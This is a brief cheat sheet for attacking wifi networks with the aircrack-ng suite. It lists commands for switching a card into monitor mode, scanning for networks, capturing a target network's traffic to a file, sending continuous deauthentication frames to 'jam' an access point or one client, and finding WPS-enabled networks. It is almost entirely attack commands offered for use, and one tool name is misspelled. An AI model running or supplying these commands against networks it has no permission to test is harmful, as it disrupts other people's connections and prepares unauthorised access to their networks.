Aircracking

Putting wifi into monitor mode:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

It may be that you can do this also by just issuing the command:

airmon-ng start wlan0

To check that your wifi device is in monitor mode:

iwconfig wlan0 | grep mode

(NB. you can change your wifi cards channel by issuing the command: iwconfig wlan channel x)

Then check to make sure no services are running on it:

airmon-ng check wlan0

Sample available Wifi's:

airodump-ng wlan0

Dump data to file concerning specific WiFi:

(note you may well not need -c or -w)

airodump-ng -c [channel#] --bssid [macaddress] -w [filename] wlan0

Jam all traffic to a Wifi:

aireplay-ng -0 0 -a [macaddress] wlan0

To jam a specific client:

airepley-ng -0 0 -a [macaddress wifi ap] -c [macaddress client] wlan0

Scan for WPS protected Wifi's:

wash -i wlan0